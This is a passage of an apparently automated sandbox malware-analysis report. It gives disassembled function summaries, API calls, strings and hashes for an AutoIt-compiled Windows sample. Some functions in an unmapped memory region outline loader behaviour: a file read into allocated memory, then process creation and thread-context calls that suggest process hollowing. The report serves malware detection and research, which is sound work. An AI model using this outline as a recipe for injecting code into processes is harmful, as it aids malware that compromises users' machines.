                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Load$Icon$ImageRegister$BrushClassColorList_$CommonControlsCreateCursorInitMessageReplaceWindow
                                                        • String ID: #$0$AutoIt v3
                                                        • API String ID: 423443420-4155596026
                                                        • Opcode ID: 44a70aab24d296bd458b9e9313b66afd487f4b7d8242b79d8cffb708330ef215
                                                        • Instruction ID: 03b4e99bd853f9f88dbfc9a0ceb7647463f9dea64f483651b6a80a7a65b3c8ff
                                                        • Opcode Fuzzy Hash: 44a70aab24d296bd458b9e9313b66afd487f4b7d8242b79d8cffb708330ef215
                                                        • Instruction Fuzzy Hash: A7213775900308EFEB10DFA4EC09B9D7BB2FB08711F10412AE504AA6B1DBB95A909F84
                                                        Function 000C3633 Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 151windowtimeregistryCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 767 c3633-c3681 769 c36e1-c36e3 767->769 770 c3683-c3686 767->770 769->770 773 c36e5 769->773 771 c3688-c368f 770->771 772 c36e7 770->772 774 c374b-c3753 PostQuitMessage 771->774 775 c3695-c369a 771->775 777 c36ed-c36f0 772->777 778 fd0cc-fd0fa call d1070 call d1093 772->778 776 c36ca-c36d2 DefWindowProcW 773->776 782 c3711-c3713 774->782 780 fd154-fd168 call 122527 775->780 781 c36a0-c36a2 775->781 783 c36d8-c36de 776->783 784 c3715-c373c SetTimer RegisterWindowMessageW 777->784 785 c36f2-c36f3 777->785 812 fd0ff-fd106 778->812 780->782 806 fd16e 780->806 787 c36a8-c36ad 781->787 788 c3755-c375f call c44a0 781->788 782->783 784->782 789 c373e-c3749 CreatePopupMenu 784->789 791 fd06f-fd072 785->791 792 c36f9-c370c KillTimer call c443a call c3114 785->792 795 fd139-fd140 787->795 796 c36b3-c36b8 787->796 807 c3764 788->807 789->782 799 fd0a8-fd0c7 MoveWindow 791->799 800 fd074-fd076 791->800 792->782 795->776 802 fd146-fd14f call 117c36 795->802 804 c36be-c36c4 796->804 805 fd124-fd134 call 122d36 796->805 799->782 808 fd078-fd07b 800->808 809 fd097-fd0a3 SetFocus 800->809 802->776 804->776 804->812 805->782 806->776 807->782 808->804 813 fd081-fd092 call d1070 808->813 809->782 812->776 817 fd10c-fd11f call c443a call c434a 812->817 813->782 817->776
                                                        APIs
                                                        • DefWindowProcW.USER32(?,?,?,?), ref: 000C36D2
                                                        • KillTimer.USER32(?,00000001), ref: 000C36FC
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000C371F
                                                        • RegisterWindowMessageW.USER32(TaskbarCreated), ref: 000C372A
                                                        • CreatePopupMenu.USER32 ref: 000C373E
                                                        • PostQuitMessage.USER32(00000000), ref: 000C374D
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: MessageTimerWindow$CreateKillMenuPopupPostProcQuitRegister
                                                        • String ID: TaskbarCreated
                                                        • API String ID: 129472671-2362178303
                                                        • Opcode ID: 655a0733869d9966f11128d171336617b780c623a0d53cfba838fbbc07e8d77e
                                                        • Instruction ID: e88ca1d200dd0247f7826fada97d1f91c2719cd4145181fa2242e3e494965b0b
                                                        • Opcode Fuzzy Hash: 655a0733869d9966f11128d171336617b780c623a0d53cfba838fbbc07e8d77e
                                                        • Instruction Fuzzy Hash: 754107B5224509BBDB346F64EC09FBD37A7EB01301F14822EF602967A2CB649B919761
                                                        Function 000C3766 Relevance: 14.3, APIs: 1, Strings: 7, Instructions: 267COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: FileLibraryLoadModuleName__wcsicmp_l_memmove
                                                        • String ID: /AutoIt3ExecuteLine$/AutoIt3ExecuteScript$/AutoIt3OutputDebug$/ErrorStdOut$>>>AUTOIT NO CMDEXECUTE<<<$CMDLINE$CMDLINERAW
                                                        • API String ID: 1825951767-3513169116
                                                        • Opcode ID: 7b599a2c79ba7c93441653a9d3be50dc972354266f787bcd4e739fbd43b008c7
                                                        • Instruction ID: 414e7fe915185702a0f8032064901d156d2e07fe6d28b12b3b86895a1326d273
                                                        • Opcode Fuzzy Hash: 7b599a2c79ba7c93441653a9d3be50dc972354266f787bcd4e739fbd43b008c7
                                                        • Instruction Fuzzy Hash: E3A1397291022DAADB14EBA4DC95EEEB779FF14310F40442EF416B7192DF745A08CBA0
                                                        Function 014CF000 Relevance: 10.7, APIs: 7, Instructions: 239fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 942 14cf000-14cf0ae call 14cca10 945 14cf0b5-14cf0db call 14cff10 CreateFileW 942->945 948 14cf0dd 945->948 949 14cf0e2-14cf0f2 945->949 950 14cf22d-14cf231 948->950 954 14cf0f9-14cf113 VirtualAlloc 949->954 955 14cf0f4 949->955 952 14cf273-14cf276 950->952 953 14cf233-14cf237 950->953 956 14cf279-14cf280 952->956 957 14cf239-14cf23c 953->957 958 14cf243-14cf247 953->958 961 14cf11a-14cf131 ReadFile 954->961 962 14cf115 954->962 955->950 963 14cf2d5-14cf2ea 956->963 964 14cf282-14cf28d 956->964 957->958 959 14cf249-14cf253 958->959 960 14cf257-14cf25b 958->960 959->960 967 14cf25d-14cf267 960->967 968 14cf26b 960->968 969 14cf138-14cf178 VirtualAlloc 961->969 970 14cf133 961->970 962->950 965 14cf2ec-14cf2f7 VirtualFree 963->965 966 14cf2fa-14cf302 963->966 971 14cf28f 964->971 972 14cf291-14cf29d 964->972 965->966 967->968 968->952 973 14cf17f-14cf19a call 14d0160 969->973 974 14cf17a 969->974 970->950 971->963 975 14cf29f-14cf2af 972->975 976 14cf2b1-14cf2bd 972->976 982 14cf1a5-14cf1af 973->982 974->950 980 14cf2d3 975->980 977 14cf2bf-14cf2c8 976->977 978 14cf2ca-14cf2d0 976->978 977->980 978->980 980->956 983 14cf1b1-14cf1e0 call 14d0160 982->983 984 14cf1e2-14cf1f6 call 14cff70 982->984 983->982 990 14cf1f8 984->990 991 14cf1fa-14cf1fe 984->991 990->950 992 14cf20a-14cf20e 991->992 993 14cf200-14cf204 CloseHandle 991->993 994 14cf21e-14cf227 992->994 995 14cf210-14cf21b VirtualFree 992->995 993->992 994->945 994->950 995->994
                                                        APIs
                                                        • CreateFileW.KERNELBASE(00000000,?,80000000,00000007,00000000,00000003,00000080,00000000,?,00000000), ref: 014CF0D1
                                                        • VirtualFree.KERNELBASE(00000000,00000000,00008000,00000000,00000000,00000000,00000000,?,?,00000000), ref: 014CF2F7
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162345808.00000000014CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014CC000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_14cc000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CreateFileFreeVirtual
                                                        • String ID:
                                                        • API String ID: 204039940-0
                                                        • Opcode ID: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                        • Instruction ID: e2ca696df020f9aa346453f10edd2efb046076eef1ebef841f9124ecb2ea5204
                                                        • Opcode Fuzzy Hash: d349c2c11462b54f33c86561be68849ac3e84e681e3d8bb3fdc8e10bc75df865
                                                        • Instruction Fuzzy Hash: 56A10778E00209EBDB54CFE4C894BEEBBB6BF48704F20855AE501BB290C7799A45CB54
                                                        Function 000C39D5 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1073 c39d5-c3a45 CreateWindowExW * 2 ShowWindow * 2
                                                        APIs
                                                        • CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 000C3A03
                                                        • CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 000C3A24
                                                        • ShowWindow.USER32(00000000,?,?), ref: 000C3A38
                                                        • ShowWindow.USER32(00000000,?,?), ref: 000C3A41
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Window$CreateShow
                                                        • String ID: AutoIt v3$edit
                                                        • API String ID: 1584632944-3779509399
                                                        • Opcode ID: 0b7a0e7939de47b40651f5d0d84c4c03a1b05afb52b1aec8b1e3a021b1a744e2
                                                        • Instruction ID: 9fc447972c4b1f2beba047fc8e2a7d1f0b82ad063c3ef68a6941246df08252b4
                                                        • Opcode Fuzzy Hash: 0b7a0e7939de47b40651f5d0d84c4c03a1b05afb52b1aec8b1e3a021b1a744e2
                                                        • Instruction Fuzzy Hash: 95F03A74540290BEEB315B23AC08E2B3E7FD7C7F50B00002EB904A2670CA650881CBB0
                                                        Function 014CEDC0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 147fileCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1074 14cedc0-14ceef7 call 14cca10 call 14cecb0 CreateFileW 1081 14ceefe-14cef0e 1074->1081 1082 14ceef9 1074->1082 1085 14cef15-14cef2f VirtualAlloc 1081->1085 1086 14cef10 1081->1086 1083 14cefae-14cefb3 1082->1083 1087 14cef31 1085->1087 1088 14cef33-14cef4a ReadFile 1085->1088 1086->1083 1087->1083 1089 14cef4c 1088->1089 1090 14cef4e-14cef88 call 14cecf0 call 14cdcb0 1088->1090 1089->1083 1095 14cef8a-14cef9f call 14ced40 1090->1095 1096 14cefa4-14cefac ExitProcess 1090->1096 1095->1096 1096->1083
                                                        APIs
                                                          • Part of subcall function 014CECB0: Sleep.KERNELBASE(000001F4), ref: 014CECC1
                                                        • CreateFileW.KERNELBASE(?,80000000,00000007,00000000,00000003,00000080,00000000), ref: 014CEEED
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162345808.00000000014CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014CC000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_14cc000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CreateFileSleep
                                                        • String ID: LO73WEXQDHNGK7PVM87
                                                        • API String ID: 2694422964-1590490914
                                                        • Opcode ID: c81313d6bf3e86320eb68458fd65169ea8b7e031a41a7051d7a4a3f642b710d5
                                                        • Instruction ID: 02d276ba686573d262735543391669536dae2cbb0912bc154167a56f43ebe7d1
                                                        • Opcode Fuzzy Hash: c81313d6bf3e86320eb68458fd65169ea8b7e031a41a7051d7a4a3f642b710d5
                                                        • Instruction Fuzzy Hash: AC518E74D04289EAEF11DBA4C814BEEBB79AF14704F00419DE608BB2C0D77A4B45CBA5
                                                        Function 000C407C Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 88windowCOMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1098 c407c-c4092 1099 c416f-c4173 1098->1099 1100 c4098-c40ad call c7a16 1098->1100 1103 fd3c8-fd3d7 LoadStringW 1100->1103 1104 c40b3-c40d3 call c7bcc 1100->1104 1107 fd3e2-fd3fa call c7b2e call c6fe3 1103->1107 1104->1107 1108 c40d9-c40dd 1104->1108 1117 c40ed-c416a call e2de0 call c454e call e2dbc Shell_NotifyIconW call c5904 1107->1117 1120 fd400-fd41e call c7cab call c6fe3 call c7cab 1107->1120 1110 c4174-c417d call c8047 1108->1110 1111 c40e3-c40e8 call c7b2e 1108->1111 1110->1117 1111->1117 1117->1099 1120->1117
                                                        APIs
                                                        • LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 000FD3D7
                                                          • Part of subcall function 000C7BCC: _memmove.LIBCMT ref: 000C7C06
                                                        • _memset.LIBCMT ref: 000C40FC
                                                        • _wcscpy.LIBCMT ref: 000C4150
                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000C4160
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: IconLoadNotifyShell_String_memmove_memset_wcscpy
                                                        • String ID: Line:
                                                        • API String ID: 3942752672-1585850449
                                                        • Opcode ID: 3a352a5d7dde181d8c865ab015debc452e29312abb24d580a4d5599fe388ba14
                                                        • Instruction ID: 7e8c965b048ab6c4ef4e510b6da2284c935229fa51ba8c87fbdcb09b763d30c9
                                                        • Opcode Fuzzy Hash: 3a352a5d7dde181d8c865ab015debc452e29312abb24d580a4d5599fe388ba14
                                                        • Instruction Fuzzy Hash: 27318D71008705AFD361EB60DC46FDF77E9EB54310F20491EF689921A2EF70A688CB92
                                                        Function 000C686A Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 260COMMON
                                                        Download Yara Rule

                                                        Control-flow Graph

                                                        • Executed
                                                        • Not Executed
                                                        control_flow_graph 1133 c686a-c6891 call c4ddd 1136 c6897-c68a5 call c4ddd 1133->1136 1137 fe031-fe041 call 12955b 1133->1137 1136->1137 1144 c68ab-c68b1 1136->1144 1140 fe046-fe048 1137->1140 1142 fe04a-fe04d call c4e4a 1140->1142 1143 fe067-fe0af call e0db6 1140->1143 1148 fe052-fe061 call 1242f8 1142->1148 1153 fe0d4 1143->1153 1154 fe0b1-fe0bb 1143->1154 1147 c68b7-c68d9 call c6a8c 1144->1147 1144->1148 1148->1143 1156 fe0d6-fe0e9 1153->1156 1157 fe0cf-fe0d0 1154->1157 1158 fe0ef 1156->1158 1159 fe260-fe263 call e2d55 1156->1159 1160 fe0bd-fe0cc 1157->1160 1161 fe0d2 1157->1161 1162 fe0f6-fe0f9 call c7480 1158->1162 1165 fe268-fe271 call c4e4a 1159->1165 1160->1157 1161->1156 1167 fe0fe-fe120 call c5db2 call 1273e9 1162->1167 1170 fe273-fe283 call c7616 call c5d9b 1165->1170 1177 fe134-fe13e call 1273d3 1167->1177 1178 fe122-fe12f 1167->1178 1184 fe288-fe2b8 call 11f7a1 call e0e2c call e2d55 call c4e4a 1170->1184 1186 fe158-fe162 call 1273bd 1177->1186 1187 fe140-fe153 1177->1187 1180 fe227-fe237 call c750f 1178->1180 1180->1167 1190 fe23d-fe247 call c735d 1180->1190 1184->1170 1194 fe176-fe180 call c5e2a 1186->1194 1195 fe164-fe171 1186->1195 1187->1180 1197 fe24c-fe25a 1190->1197 1194->1180 1202 fe186-fe19e call 11f73d 1194->1202 1195->1180 1197->1159 1197->1162 1208 fe1c1-fe1c4 1202->1208 1209 fe1a0-fe1bf call c7de1 call c5904 1202->1209 1210 fe1c6-fe1e1 call c7de1 call c6839 call c5904 1208->1210 1211 fe1f2-fe1f5 1208->1211 1232 fe1e2-fe1f0 call c5db2 1209->1232 1210->1232 1215 fe1f7-fe200 call 11f65e 1211->1215 1216 fe215-fe218 call 12737f 1211->1216 1215->1184 1227 fe206-fe210 call e0e2c 1215->1227 1221 fe21d-fe226 call e0e2c 1216->1221 1221->1180 1227->1167 1232->1221
                                                        APIs
                                                          • Part of subcall function 000C4DDD: LoadLibraryExW.KERNEL32(?,00000000,00000002,?,001852F8,00000001,>>>AUTOIT NO CMDEXECUTE<<<,?), ref: 000C4E0F
                                                        • _free.LIBCMT ref: 000FE263
                                                        • _free.LIBCMT ref: 000FE2AA
                                                          • Part of subcall function 000C6A8C: SetCurrentDirectoryW.KERNEL32(?,?,?,?,00000000), ref: 000C6BAD
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _free$CurrentDirectoryLibraryLoad
                                                        • String ID: >>>AUTOIT SCRIPT<<<$Bad directive syntax error
                                                        • API String ID: 2861923089-1757145024
                                                        • Opcode ID: e6900df6847237eca62bf8294e3d3ccc699ab2dcf47372fb1bc03770ea19aee8
                                                        • Instruction ID: a49b42b6b20addd4940a3148ecf6841fc47dbfcc8ae1cb3a868ba459165ee4e0
                                                        • Opcode Fuzzy Hash: e6900df6847237eca62bf8294e3d3ccc699ab2dcf47372fb1bc03770ea19aee8
                                                        • Instruction Fuzzy Hash: FC919D7190026DAFCF14EFA4CC919EDB7B8FF15310B10442EF916AB2A2EB70A955DB50
                                                        Function 000C35B0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 59registryCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,00000003,00000000,80000001,80000001,?,000C35A1,SwapMouseButtons,00000004,?), ref: 000C35D4
                                                        • RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,000C35A1,SwapMouseButtons,00000004,?,?,?,?,000C2754), ref: 000C35F5
                                                        • RegCloseKey.KERNELBASE(00000000,?,?,000C35A1,SwapMouseButtons,00000004,?,?,?,?,000C2754), ref: 000C3617
                                                        Strings
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: CloseOpenQueryValue
                                                        • String ID: Control Panel\Mouse
                                                        • API String ID: 3677997916-824357125
                                                        • Opcode ID: 75752eb7e0120d0462d916c387617fb0967fcd591c093f1caf08deea840e606f
                                                        • Instruction ID: 8f5dd00cf7d94063cb88e646988a298f3b424df17da7e4a3d8d64519a67f306e
                                                        • Opcode Fuzzy Hash: 75752eb7e0120d0462d916c387617fb0967fcd591c093f1caf08deea840e606f
                                                        • Instruction Fuzzy Hash: DF114575620208BFDB208F64DC84EAFBBB9EF45740F01C469F805D7220E2729E419BA0
                                                        Function 014CDCB0 Relevance: 6.7, APIs: 4, Instructions: 720processthreadCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • CreateProcessW.KERNELBASE(?,00000000), ref: 014CE46B
                                                        • Wow64GetThreadContext.KERNEL32(?,00010007), ref: 014CE501
                                                        • ReadProcessMemory.KERNELBASE(?,?,?,00000004,00000000), ref: 014CE523
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2162345808.00000000014CC000.00000040.00000020.00020000.00000000.sdmp, Offset: 014CC000, based on PE: false
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_14cc000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: Process$ContextCreateMemoryReadThreadWow64
                                                        • String ID:
                                                        • API String ID: 2438371351-0
                                                        • Opcode ID: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                        • Instruction ID: 1a30e677bb63c7b559d0b9270414ae8e3c11f4d66bfa3e8e668429a335b338b7
                                                        • Opcode Fuzzy Hash: 91de96a0508c6d9b88b93d6c14255c09b3dee72855056c89e06ebe7f8a996ab2
                                                        • Instruction Fuzzy Hash: D4620E34A14258DBEB24CFA4C850BDEB776EF58700F1091A9D10DEB3A0E7799E81CB59
                                                        Function 0012955B Relevance: 6.2, APIs: 4, Instructions: 155COMMON
                                                        Download Yara Rule
                                                        APIs
                                                          • Part of subcall function 000C4EE5: _fseek.LIBCMT ref: 000C4EFD
                                                          • Part of subcall function 00129734: _wcscmp.LIBCMT ref: 00129824
                                                          • Part of subcall function 00129734: _wcscmp.LIBCMT ref: 00129837
                                                        • _free.LIBCMT ref: 001296A2
                                                        • _free.LIBCMT ref: 001296A9
                                                        • _free.LIBCMT ref: 00129714
                                                          • Part of subcall function 000E2D55: RtlFreeHeap.NTDLL(00000000,00000000,?,000E9A24), ref: 000E2D69
                                                          • Part of subcall function 000E2D55: GetLastError.KERNEL32(00000000,?,000E9A24), ref: 000E2D7B
                                                        • _free.LIBCMT ref: 0012971C
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: _free$_wcscmp$ErrorFreeHeapLast_fseek
                                                        • String ID:
                                                        • API String ID: 1552873950-0
                                                        • Opcode ID: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                        • Instruction ID: 6bd556ddbe072f7de40cd91e0a2335ae24fddd0f1706e39202bd1bdabe845f90
                                                        • Opcode Fuzzy Hash: 83a1bf45cb5b46f0fbbb2b282febcfcf75e63ad05b5baa694a85d9b23f0f737c
                                                        • Instruction Fuzzy Hash: 19513EB1D04258AFDF249F65DC81ADEBB79FF48300F1044AEB649A3242DB715A91CF58
                                                        Function 000E470A Relevance: 6.1, APIs: 4, Instructions: 136COMMON
                                                        Download Yara Rule
                                                        APIs
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: __flsbuf__flush__getptd_noexit__write_memmove
                                                        • String ID:
                                                        • API String ID: 2782032738-0
                                                        • Opcode ID: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                        • Instruction ID: 670b9fa977b3c185bf73bac9263652b5e6131725d8d453b69aa9b72aeeb67db2
                                                        • Opcode Fuzzy Hash: 998aeda2236a74d80706e5f9a46343bd1135ee917ddd04e378ba6ed458c3dace
                                                        • Instruction Fuzzy Hash: 6841D674A047C69FDB28CE6BC9809AE77E6EF82360F24817DE855E7640DB70DD408B80
                                                        Function 000C44A0 Relevance: 6.1, APIs: 4, Instructions: 66timewindowCOMMON
                                                        Download Yara Rule
                                                        APIs
                                                        • _memset.LIBCMT ref: 000C44CF
                                                          • Part of subcall function 000C407C: _memset.LIBCMT ref: 000C40FC
                                                          • Part of subcall function 000C407C: _wcscpy.LIBCMT ref: 000C4150
                                                          • Part of subcall function 000C407C: Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000C4160
                                                        • KillTimer.USER32(?,00000001,?,?), ref: 000C4524
                                                        • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 000C4533
                                                        • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 000FD4B9
                                                        Memory Dump Source
                                                        • Source File: 00000000.00000002.2161814461.00000000000C1000.00000020.00000001.01000000.00000003.sdmp, Offset: 000C0000, based on PE: true
                                                        • Associated: 00000000.00000002.2161796787.00000000000C0000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.000000000014F000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161863427.0000000000174000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161917801.000000000017E000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                        • Associated: 00000000.00000002.2161935057.0000000000187000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                        Joe Sandbox IDA Plugin
                                                        • Snapshot File: hcaresult_0_2_c0000_fFoOcuxK7M.jbxd
                                                        Similarity
                                                        • API ID: IconNotifyShell_Timer_memset$Kill_wcscpy
                                                        • String ID:
                                                        • API String ID: 1378193009-0
                                                        • Opcode ID: 5c2596eabcc9e97246d84ac27c04c511c61e3b4164e990dc03009f91bbdbdffd
                                                        • Instruction ID: 7b442cd997ad8b620d0b62cf9c8d67c572225e4b72b02b1d5d4ee5ad003553d6
